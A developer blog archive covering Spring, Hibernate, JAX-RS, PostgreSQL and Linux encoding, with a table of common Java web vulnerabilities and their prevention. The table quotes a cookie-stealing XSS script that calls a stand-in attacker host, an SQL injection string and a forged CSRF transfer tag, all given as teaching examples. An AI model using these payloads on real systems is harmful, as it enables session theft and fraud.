Sunday, July 31, 2016
Friday, July 29, 2016
Spring boot, Spring security and rest
- Exploring Spring-Boot and Spring-Security: Custom token based authentication of REST services with Spring-Security and pinch of Spring Java Configuration and Spring Integration Testing.
- Spring Boot: Authentication with custom http header.
- http://docs.spring.io/spring-security/site/docs/current/reference/html/headers.html
- Spring Boot with oauth2
- http://stackoverflow.com/users/1259109/dave-syer
- http://spring.io/team/dsyer
Monday, July 25, 2016
Hibernate's hbm2ddl Tool
Hibernate's hbm2ddl is a tool that allows us to create, update, and validate a database schema using Hibernate mapping configuration. The .hbm files are Hibernate mapping files, but since the schema export/validation is done using the internal configuration Hibernate creates for the entity mappings, we can still use hbm2ddl when working with JPA. As usual, I write here about the JPA environment; just remember that hbm2ddl can also be invoked from the command line or via an Ant task.
Setup
To invoke Hibernate's hbm2ddl during the creation of the entity manager factory, set the 'hibernate.hbm2ddl.auto' property to one of:
· create
· create-drop
· update
· validate
Here is an example:

<persistence>
  <persistence-unit name="sampleContext" transaction-type="RESOURCE_LOCAL">
    <provider>org.hibernate.ejb.HibernatePersistence</provider>
    <properties>
      <property name="hibernate.connection.driver_class" value="org.apache.derby.jdbc.ClientDriver"/>
      <property name="hibernate.connection.username" value="app"/>
      <property name="hibernate.connection.password" value="app"/>
      <property name="hibernate.connection.url" value="jdbc:derby://localhost:1527/HibernateTestDB;create=true"/>
      <property name="hibernate.hbm2ddl.auto" value="validate"/>
    </properties>
  </persistence-unit>
</persistence>
The Options and Their Meanings
create
Hibernate will create the database schema when the entity manager factory is created (actually, when Hibernate's SessionFactory is created by the entity manager factory). If a file named import.sql exists in the root of the class path ('/import.sql'), Hibernate will execute the SQL statements read from that file after the creation of the database schema. It is important to remember that before Hibernate creates the schema it empties it (dropping all tables, constraints, and any other database objects that would be created in the process of building the schema).
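For instance, a minimal import.sql on the class path root might look like the sketch below (the table name and values are hypothetical; adjust them to your own entity mappings):

```sql
-- /import.sql: executed by Hibernate after schema creation in 'create' mode.
-- Illustrative seed data only; the 'country' table is a hypothetical entity.
INSERT INTO country (id, name) VALUES (1, 'Romania');
INSERT INTO country (id, name) VALUES (2, 'Germany');
```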
create-drop
Same as 'create' but when the entity manager factory (which holds the SessionFactory) is explicitly closed the schema will be dropped.
update
Hibernate creates an update script and tries to update the database structure to match the current mapping. It does not read or invoke the SQL statements from import.sql. Useful, but we have to be careful: not all updates can be performed, for example adding a not-null column to a table with existing data.
validate
Validates the existing schema with the current entities configuration. When using this mode Hibernate will not do any changes to the schema and will not use the import.sql file.
Mode | Reads import.sql | Alters Database Structure | Comments |
update | No | Yes | |
create | Yes | Yes | Empties the database before creating it |
create-drop | Yes | Yes | Drops the database when the SessionFactory is closed |
validate | No | No | |
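If you happen to bootstrap Hibernate through Spring Boot rather than a persistence.xml, the same switch is typically exposed via the spring.jpa.hibernate.ddl-auto property, which Boot passes down to hibernate.hbm2ddl.auto (a sketch, assuming a standard Boot JPA setup):

```properties
# application.properties: Boot forwards this to hibernate.hbm2ddl.auto
spring.jpa.hibernate.ddl-auto=validate
```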
Resource Link:
- http://learningviacode.blogspot.ro/2011/09/hibernatehbm2ddlauto-2.html
- http://blog.eyallupu.com/2007/05/hibernates-hbm2ddl-tool.html
Conditional JAX-RS filter
JAX-RS has the notion of a DynamicFeature: this is a feature that is decided on a per-resource-method basis. This means that we can fine-tune the behavior of the application based on each REST endpoint/method. Imagine the following use case: you have a multi-tenant system and you want to create a filter that blocks incoming requests if they don't provide the tenant information. By default, all endpoints require a tenant, but there are some endpoints or methods that don't require this tenant information. Instead of building a generic filter that will be processed for all incoming requests, you can just create an annotation and mark the places you don't want the filter to run.
First, your DynamicFeature needs to implement the configure(ResourceInfo, FeatureContext) method, like this:

@Provider
public class TenantFeature implements DynamicFeature {
private static final TenantFilter TENANT_FILTER = new TenantFilter();
@Override
public void configure(ResourceInfo resourceInfo, FeatureContext context) {
Class<?> resourceClass = resourceInfo.getResourceClass();
Method method = resourceInfo.getResourceMethod();
boolean required = true;
if (resourceClass.isAnnotationPresent(TenantRequired.class)) {
required = resourceClass.getAnnotation(TenantRequired.class).value();
}
if (method.isAnnotationPresent(TenantRequired.class)) {
required = method.getAnnotation(TenantRequired.class).value();
}
if (required) {
context.register(TENANT_FILTER);
}
}
}
Then our actual filter. Note that this is not marked with @Provider, as we don't want it applied to all resources discovered by the JAX-RS implementation.

public class TenantFilter implements ContainerRequestFilter {
private static final String TENANT_HEADER_NAME = "Tenant";
private static final String MESSAGE = String.format("The HTTP header %s has to be provided.", TENANT_HEADER_NAME);
private static final Response BAD_REQUEST_MISSING_TENANT = Response
.status(Response.Status.BAD_REQUEST)
.entity(MESSAGE)
.build();
@Override
public void filter(ContainerRequestContext requestContext) throws IOException {
String headerValue = requestContext.getHeaderString(TENANT_HEADER_NAME);
if (null == headerValue || headerValue.isEmpty()) {
requestContext.abortWith(BAD_REQUEST_MISSING_TENANT);
}
    }
}
And finally, the annotation we'll use to mark the parts we don't want the filter to run on. Note that the default value is set to true.

@Retention(RUNTIME)
@Target({METHOD, TYPE})
public @interface TenantRequired {
@Nonbinding
boolean value() default true;
}
Our business code would look like this. For all non-annotated methods/classes, the filter runs. So GET /foo requires our tenant header, whereas POST /foo doesn't.

@Path("/foo")
public class FooEndpoint {
@GET
public Response getFoo() {
return Response.ok("bar").build();
}
@TenantRequired(false)
@POST
public Response getFooWithoutTenant() {
return Response.ok("bar").build();
}
}
Or we could mark the entire endpoint as not requiring a tenant:
@Path("no-tenant")
@TenantRequired(false)
public class FooNoTenantEndpoint {
@GET
public Response getFoo() {
return Response.ok("bar").build();
}
}
Resource Link: https://blog.kroehling.de/conditional-jax-rs-filter/
Backup and restore in Postgresql using various ways
9 ways to backup and restore in Postgresql
Following are some of the commands I use to back up and restore my Postgres databases and tables.
- Plain SQL backup: pg_dump is a nifty utility designed to output a series of SQL statements that describe the schema and data of your database. You can control what goes into your backup by using additional flags. (-h is for host, -p for port, -U for username, -d for database.)
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb > backup.sql
Restore: psql -h localhost -p 5432 -U postgres -d mydb < backup.sql
- Single-transaction restore: you can use --single-transaction in your restore command. It wraps the entire restore operation in one transaction; if something goes wrong, it rolls back all the changes.
Restore: psql --single-transaction -h localhost -p 5432 -U postgres -d mydb < backup.sql
- Compressed backup: if your backup is too big, you can use any compression utility to compress it. I prefer gzip.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb | gzip > backup.gz
Restore: gunzip -c backup.gz | psql -h localhost -p 5432 -U postgres -d mydb
- Split backup file: if you are going to email your backup files or transfer them over the internet, I suggest splitting them into smaller files. You can use the split utility with a size limit; in this example I am using a 2 MB limit.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb | split -b 2m - backup.sql
Restore: cat backup.sql* | psql -h localhost -p 5432 -U postgres -d mydb
- Split compressed backup file: this is just a combination of the previous two points; we first compress the output and then split it, instead of splitting the plain file.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb | gzip | split -b 1m - backup.gz
Restore: cat backup.gz* | gunzip | psql -h localhost -p 5432 -U postgres -d mydb
- Parallel backup: you can allow pg_dump to dump data in parallel by including the -j flag, which tells pg_dump the number of tables it can dump in parallel. Parallel backup only works when the backup is written to more than one file, hence the directory format: -F d sets the format to directory and -f provides the directory name.
Backup: pg_dump -F d -f backup -j 20 -h localhost -p 5432 -U postgres -d mydb
Restore: pg_restore -F d -j 20 -h localhost -p 5432 -U postgres -d mydb backup
- Backup of a specific table: you can take a backup of a specific table by adding the -t flag.
Backup: pg_dump -h localhost -p 5432 -U postgres -d mydb -t my_table > backup.sql
Restore: psql -h localhost -p 5432 -U postgres -d mydb < backup.sql
- Backup of all databases: pg_dumpall is used to back up all of your PostgreSQL databases. It is essentially a wrapper around pg_dump, and it will ask for a password for every database.
Backup: pg_dumpall -h localhost -p 5432 -U postgres > backup.sql
Restore: psql -h localhost -p 5432 -U postgres < backup.sql
- Custom format backup (-F c): Keith mentioned in the comments that -F c provides better options at restore time. You can take a backup of the whole database and restore only selected tables using the -t flag, and it also compresses the backup data for you. All these features are also provided by the directory format (-F d). The main difference is that the custom format generates a single file while the directory format generates a directory full of files; a single file (single stream) is easier to send over SSH or transfer to another service than a directory (multiple streams). One more difference is that you cannot use the parallel backup option (-j) with the custom format, which is to be expected since it uses only one stream.
Backup: pg_dump -F c -h localhost -p 5432 -U postgres -d mydb > backup.dat
Restore: pg_restore -F c -h localhost -p 5432 -U postgres -t my_table -d mydb backup.dat
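The pipelines above are plain Unix plumbing, so you can sanity-check the compress-and-split round trip without a live server. Here is a sketch using a throwaway file in place of the pg_dump output (all file names are arbitrary):

```shell
# Stand-in for `pg_dump ... |`: generate some data, compress and split it,
# then reassemble it and verify the round trip is lossless.
seq 1 100000 > original.sql                      # fake dump output
gzip -c original.sql | split -b 64k - backup.gz. # lone '-' means read stdin
cat backup.gz.* | gunzip > restored.sql          # what you would pipe into psql
cmp original.sql restored.sql && echo "round trip OK"
```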
Some other useful flags in pg_dump:
-v, --verbose                verbose mode
-V, --version                output version information, then exit
-?, --help                   show this help, then exit
-a, --data-only              dump only the data, not the schema
-b, --blobs                  include large objects in dump
-c, --clean                  clean (drop) database objects before recreating
-C, --create                 include commands to create database in dump
-E, --encoding=ENCODING      dump the data in encoding ENCODING
-n, --schema=SCHEMA          dump the named schema(s) only
-N, --exclude-schema=SCHEMA  do NOT dump the named schema(s)
-o, --oids                   include OIDs in dump
-O, --no-owner               skip restoration of object ownership in plain-text format
-s, --schema-only            dump only the schema, no data
-S, --superuser=NAME         superuser user name to use in plain-text format
-t, --table=TABLE            dump the named table(s) only
-T, --exclude-table=TABLE    do NOT dump the named table(s)
-x, --no-privileges          do not dump privileges (grant/revoke)
References
Restful Web Services: Tutorial
- Spring MVC 4 RESTFul Web Services CRUD Example+RestTemplate
- What exactly is RESTful programming?
- Building REST APIs With Spring Boot
- Post JSON to spring REST webservice
- steps toward the glory of REST
- Spring Data JPA - Reference Documentation
- http://www.drdobbs.com/web-development/restful-web-services-a-tutorial/240169069
Friday, July 22, 2016
Security vulnerabilities in java-based web applications
Web Attack methods
Security Vulnerability | What is it? | Example Attack Scenario | Prevention |
Cross-Site Scripting (XSS) | XSS flaws occur when an application takes untrusted data and passes it to the browser without suitable validation/escaping. It allows an attacker to run malicious scripts in the victim's browser, leading to hijacked user sessions, defaced web sites, and invalid redirects and forwards. | The application builds HTML from unvalidated input: String page += "<input name='myaccountname' type='TEXT' value='" + request.getParameter("FF") + "'>"; The attacker changes the 'FF' parameter in their browser to: <script>document.location='http://www.hacker.com/cgi-bin/cookie.cgi?param='+document.cookie</script>. This sends the victim's session ID to the attacker's site, where it can be misused for access. | 1. Escape all input data. 2. Strong input validation that decodes all encoded information. |
Using Components with Known Vulnerabilities | Software components like frameworks, libraries, and other modules usually run with full privileges, so a vulnerable component may undermine the application's defences and allow a range of impacts or attacks. | Misuse of the Expression Language (EL) in a Spring-based web application permits attackers to run arbitrary code, leading to unauthorized access. | 1. Identify dependent components. 2. Monitor the security of used components in version and public listings. 3. Develop security policies. |
SQL Injection | A technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. | The software builds a query from malicious data: String query = "SELECT * FROM branches WHERE branchID='" + request.getParameter("name") + "'"; The attacker can change the name parameter and append ' or '1'='1, which alters the query and fetches all records. | 1. Use prepared statements in queries and procedures. 2. Escape user input, especially special characters. |
Missing Function Level Access Control | Function-level access rights are usually verified before the functionality appears in the UI, but the same access-control checks must also be done on the server when each function is accessed. If requests are not checked, attackers can forge requests to access functionality without authorization. | The attacker simply forces the browser to hit target URLs. Say the URLs below require authentication, and admin rights are also required for the admin_getAppAccess page: http://myweb.com/appl/getAppAccess http://myweb.com/appl/admin_getAppAccess. If a non-admin, unauthenticated user can access either page, that's a flaw. | 1. Access control for business processes. 2. Role-based authorization for every operation. 3. Restricted access to file management. |
Sensitive Data Exposure | Sometimes web portals fail to properly protect sensitive data like account details and authentication credentials. An attacker might steal or change such weakly protected information to commit crimes like debit card fraud or identity theft. Sensitive information needs extra care: encryption at rest and in transit, and special precautions when exchanged with the browser. | A site simply doesn't use SSL for every authenticated page. An attacker observes network traffic (say, on an open wireless network) and steals the user's session cookie, then replays the cookie, hijacks the session, and accesses the user's private information. | 1. Don't store sensitive data unnecessarily. 2. Ensure passwords are stored with an algorithm specifically designed for password protection. 3. Disable auto-complete and caching on forms collecting sensitive data. |
Cross-Site Request Forgery (CSRF) | CSRF allows an attacker to make a logged-on victim's browser send a forged HTTP request, along with the victim's session cookie and any other automatically included credentials, to a vulnerable web application. The application treats the forged requests as legitimate requests from the victim. | The application allows a state-changing request: http://myweb/app/sendFunds?amount=9880&targetAct=4673892. The attacker crafts a request transferring money from the victim's account to the attacker's and embeds it in an image or iframe: <img src="http://myweb/app/sendFunds?amount=9880&targetAct=hackerAcct#" />. If the victim visits any site hosting this while already authenticated, the forged request carries the session info and is inadvertently authorized. | 1. Include a unique token in a hidden field or URL. 2. Verify the Origin and Referer headers. 3. A CAPTCHA can be incorporated. |
Insecure Direct Object References | Occurs when a developer exposes a direct or indirect reference to an internal implementation object, such as a folder, file, or database key. Without access-control checks or other protection, attackers can manipulate these references to access unauthorized data. | The application uses unverified data in a SQL query: String query = "SELECT * FROM myacts WHERE accntNo = ?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, request.getParameter("acnumber")); ResultSet results = pstmt.executeQuery(); The attacker simply modifies the 'acnumber' parameter: http://myweb.com/app/info?acct=notuseraccount | 1. Use per-user or per-session indirect object references: for instance, a list of 4 resources could use the keys 1 to 4 to indicate the value the user can choose, instead of referring to the resource's name. 2. Check access for each request. |
Unvalidated Redirects & Forwards | Web sites often redirect and forward users to other pages and sites, using untrusted data to determine the destination pages. Without suitable validation, an attacker can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages. | Suppose a page called "redirect.jsp" exists in the application, taking a single parameter named "url". The attacker crafts a malicious URL that redirects users to an untrusted site: http://www.myweb.com/redirect.jsp?url=hack.com | 1. Review the implementation for all uses of forwards and redirects. 2. Check whether the application makes redirects at all. |
Security Misconfiguration | Proper security requires a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure and robust configuration settings should be defined, implemented, and maintained, as default configurations are often easily attacked; software should also be kept up to date. | The admin console of the app server is automatically installed and not removed, and default accounts remain unchanged. An attacker finds the standard admin pages on the server, logs in with the default username/password, and takes over. | 1. Repeat the hardening process regularly. 2. The product architecture should be strong, with loose coupling and tight security among modules. |
Broken Authentication & Session Management | Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to assume other users' identities by compromising keys, passwords, or session tokens, or by exploiting other implementation flaws. | A hotel-booking application supports URL rewriting, embedding session IDs in the URL: http://myweb.com/list/jsessionid=2K0OC2PNPOLCDSN2JV?dest=Goa. A legitimate user e-mails the link to colleagues to share his purchases, without being aware that he is also giving away his session ID; when the colleagues use the link, they use his session and debit card. | 1. Hard authorization and session-management checks. 2. Prevent cross-site scripting flaws, which further prevents session-ID theft. 3. Use SSL. |
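The "escape all input data" advice from the XSS row can be sketched with a tiny example. Python's stdlib html.escape is shown here purely for brevity; any server-side HTML encoder (e.g. one from your Java templating library) works the same way, and the input-field markup mirrors the hypothetical snippet in the table:

```python
from html import escape

def render_input(account_name: str) -> str:
    # Escaping turns markup characters into entities, so an injected
    # <script> tag renders as inert text instead of executing.
    return "<input name='myaccountname' type='TEXT' value='{}'>".format(
        escape(account_name, quote=True))

print(render_input("<script>alert(1)</script>"))
```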
Resource Link: Security vulnerabilities in java-based web applications
Thursday, July 21, 2016
Function writing using postgresql
- http://www.postgresonline.com/journal/archives/58-Quick-Guide-to-writing-PLPGSQL-Functions-Part-1.html
- http://www.postgresonline.com/journal/archives/76-Quick-Guide-to-writing-PLPGSQL-Functions-Part-2.html
- http://www.postgresqltutorial.com/postgresql-create-function/
- https://www.postgresql.org/docs/9.2/static/plpgsql-cursors.html
- https://www.postgresql.org/docs/9.1/static/plpgsql-declarations.html
- https://www.postgresql.org/docs/9.1/static/plpgsql-porting.html
- http://www.sqlines.com/postgresql/stored_procedures_functions
- https://wiki.postgresql.org/wiki/Return_more_than_one_row_of_data_from_PL/pgSQL_functions
Postgresql Cursor: How cursor works in function of postgresql?
Summary: in this tutorial, we will show you how to use PL/pgSQL Cursor and give you some practical examples of using cursors.
A PL/pgSQL cursor allows us to encapsulate a query and process each individual row at a time. We use cursors when we want to divide a large result set into parts and process each part individually. If we process it at once, we may have a memory overflow error.
In addition, we can develop a function that returns a reference to a cursor. This is an efficient way to return a large result set from a function. The caller of the function can process the result set based on the cursor reference.
The following diagram illustrates how to use a cursor in PostgreSQL:
PL/pgSQL Cursor
- First, declare a cursor.
- Next, open the cursor.
- Then, fetch rows from the result set into a target.
- After that, check if there are more rows left to fetch. If yes, go to step 3; otherwise go to step 5.
- Finally, close the cursor.
Declaring cursors
To access a cursor, you need to declare a cursor variable in the declaration section of a block. PostgreSQL provides a special type called REFCURSOR for declaring a cursor variable.
DECLARE
my_cursor REFCURSOR;
Another way to declare a cursor that is bound to a query uses the following syntax:
cursor_name [ [NO] SCROLL ] CURSOR [( name datatype, name data type, ...)] FOR query;
First, you specify a variable name for the cursor.
Next, you specify whether the cursor can be scrolled backward using the SCROLL. If you use NO SCROLL, the cursor cannot be scrolled backward.
Then, you put the CURSOR keyword followed by a list of comma-separated arguments ( name datatype) that defines parameters for the query. These arguments will be substituted by values when the cursor is opened.
After that, you specify a query following the FOR keyword. You can use any valid SELECT statement here.
The following example illustrates how to declare cursors:
DECLARE
cur_films CURSOR FOR SELECT * FROM film;
cur_films2 CURSOR (year integer) FOR SELECT * FROM film WHERE release_year = year;
The cur_films is a cursor that encapsulates all rows in the film table.
The cur_films2 is a cursor that encapsulates film with a particular release year in the film table.
Opening cursors
Cursors must be opened before they can be used to query rows. PostgreSQL provides syntax for opening unbound and bound cursors.

Opening unbound cursors
We open an unbound cursor using the following syntax:
OPEN unbound_cursor_variable [ [ NO ] SCROLL ] FOR query;
Because an unbound cursor variable is not bound to any query when we declare it, we have to specify the query when we open it. See the following example:
OPEN my_cursor FOR SELECT * FROM city WHERE country = p_country;
PostgreSQL also allows us to open a cursor and bind it to a dynamic query. Here is the syntax:
OPEN unbound_cursor_variable[ [ NO ] SCROLL ]
FOR EXECUTE query_string [USING expression [, ... ] ];
In the following example, we build a dynamic query that sorts rows based on a sort_field parameter, and open the cursor that executes the dynamic query.
query := 'SELECT * FROM city ORDER BY $1';
OPEN cur_city FOR EXECUTE query USING sort_field;
Opening bound cursors
Because a bound cursor is already bound to a query when we declare it, when we open it we just need to pass arguments to the query if necessary:
OPEN cursor_variable [ (name := value, name := value, ...) ];
In the following example, we open bound cursors cur_films and cur_films2 that we declared above:
OPEN cur_films;
OPEN cur_films2(year:=2005);
Using cursors
After opening a cursor, we can manipulate it using the FETCH, MOVE, UPDATE, or DELETE statements.
Fetching the next row
FETCH [ direction { FROM | IN } ] cursor_variable INTO target_variable;
The FETCH statement gets the next row from the cursor and assigns it to a target_variable, which could be a record, a row variable, or a comma-separated list of variables. If no more rows are found, the target_variable is set to NULL(s).
By default, a cursor gets the next row if you don't specify the direction explicitly. The following directions are valid for the cursor:
- NEXT
- LAST
- PRIOR
- FIRST
- ABSOLUTE count
- RELATIVE count
- FORWARD
- BACKWARD
See the following examples of fetching cursors.
FETCH cur_films INTO row_film;
FETCH LAST FROM cur_films INTO title, release_year;
Moving the cursor
MOVE [ direction { FROM | IN } ] cursor_variable;
If you want to move the cursor only without retrieving any row, you use the MOVE statement. The direction accepts the same value as the FETCH statement.
MOVE cur_films2;
MOVE LAST FROM cur_films;
MOVE RELATIVE -1 FROM cur_films;
MOVE FORWARD 3 FROM cur_films;
Deleting or updating row
Once a cursor is positioned, we can delete or update the row identified by the cursor using the DELETE WHERE CURRENT OF or UPDATE WHERE CURRENT OF statements as follows:
UPDATE table_name
SET column = value, ...
WHERE CURRENT OF cursor_variable;
DELETE FROM table_name
WHERE CURRENT OF cursor_variable;
See the following example.
UPDATE film SET release_year = p_year
WHERE CURRENT OF cur_films;
Closing cursors
To close an open cursor, we use the CLOSE statement as follows:
CLOSE cursor_variable;
The CLOSE statement releases resources and frees up the cursor variable, allowing it to be opened again with the OPEN statement.
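Earlier we noted that a function can return a cursor reference to its caller. That pattern could be sketched like this (the function and table names are hypothetical; the portal name in the caller comments is whatever the server assigns):

```sql
-- Sketch: a function that opens a cursor and hands the reference back.
CREATE OR REPLACE FUNCTION get_city_cursor() RETURNS refcursor AS $$
DECLARE
    ref refcursor;                    -- unbound cursor variable
BEGIN
    OPEN ref FOR SELECT * FROM city;  -- bind to a query and open it here
    RETURN ref;                       -- the caller fetches from this reference
END;
$$ LANGUAGE plpgsql;

-- Caller side, inside a single transaction:
-- BEGIN;
-- SELECT get_city_cursor();           -- returns e.g. "<unnamed portal 1>"
-- FETCH ALL IN "<unnamed portal 1>";  -- process the result set
-- COMMIT;
```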
PL/pgSQL cursors – putting it all together
The following get_film_titles(integer) function accepts an argument that represents the release year of a film. Inside the function, we query all films whose release year equals the year passed to the function. We use the cursor to loop through the rows and concatenate the title and release year of each film whose title contains the word 'ful'.

CREATE OR REPLACE FUNCTION get_film_titles(p_year INTEGER)
RETURNS text AS $$
DECLARE
titles TEXT DEFAULT '';
rec_film RECORD;
cur_films CURSOR(p_year INTEGER)
FOR SELECT title, release_year
FROM film
WHERE release_year = p_year;
BEGIN
-- Open the cursor
OPEN cur_films(p_year);
LOOP
-- fetch row into the film
FETCH cur_films INTO rec_film;
-- exit when no more row to fetch
EXIT WHEN NOT FOUND;
-- build the output
IF rec_film.title LIKE '%ful%' THEN
titles := titles || ',' || rec_film.title || ':' || rec_film.release_year;
END IF;
END LOOP;
-- Close the cursor
CLOSE cur_films;
RETURN titles;
END; $$
LANGUAGE plpgsql;
SELECT get_film_titles(2006);
,Grosse Wonderful:2006,Day Unfaithful:2006,Reap Unfaithful:2006,Unfaithful Kill:2006,Wonderful Drop:2006
In this tutorial, we have shown you how to work with PL/pgSQL cursor to loop through a set of rows and process each row individually.
Resource Link:
Wednesday, July 20, 2016
How to change character encoding of a text file on Linux
http://ask.xmodulo.com/change-character-encoding-text-file-linux.html
http://stackoverflow.com/questions/5306153/how-to-get-terminals-character-encoding
For checking current charset
[user@ip-192-191-181-181 java]$ echo $LANG
ja_JP.UTF-8
For checking current encoding
[user@ip-192-191-181-181 java]$ locale charmap
UTF-8
For current encoding:
locale charmap
For available locales:
locale -a
For available encodings:
locale -m
Questions:
- How can I know which character encoding a certain text file is using?
- How can I convert it to some other encoding of my choosing?
Step One
In order to find out the character encoding of a file, we will use a command-line tool called file. Since the file command is a standard UNIX program, we can expect to find it in all modern Linux distros.
Run the following command:
$ file --mime-encoding filename
Step Two
The next step is to check what kinds of text encodings are supported on your Linux system. For this, we will use a tool called iconv with the "-l" flag (lowercase L), which will list all the currently supported encodings.
$ iconv -l
The iconv utility is part of the GNU libc libraries, so it is available in all Linux distributions out of the box.
Step Three
Once we have selected a target encoding among those supported on our Linux system, let's run the following command to perform the conversion:
$ iconv -f old_encoding -t new_encoding filename
For example, to convert iso-8859-1 to utf-8:
$ iconv -f iso-8859-1 -t utf-8 input.txt
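Putting steps one and three together, here is a quick end-to-end sketch: it fabricates a small ISO-8859-1 file (the file names are throwaway), detects its encoding, converts it, and detects again:

```shell
# "café" with a raw Latin-1 e-acute byte (octal 351 = 0xE9)
printf 'caf\351\n' > sample.txt
file --mime-encoding sample.txt       # typically reports iso-8859-1
iconv -f iso-8859-1 -t utf-8 sample.txt > sample.utf8.txt
file --mime-encoding sample.utf8.txt  # typically reports utf-8
```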
Knowing how to use these tools together as we have demonstrated, you can, for example, fix a broken subtitle file.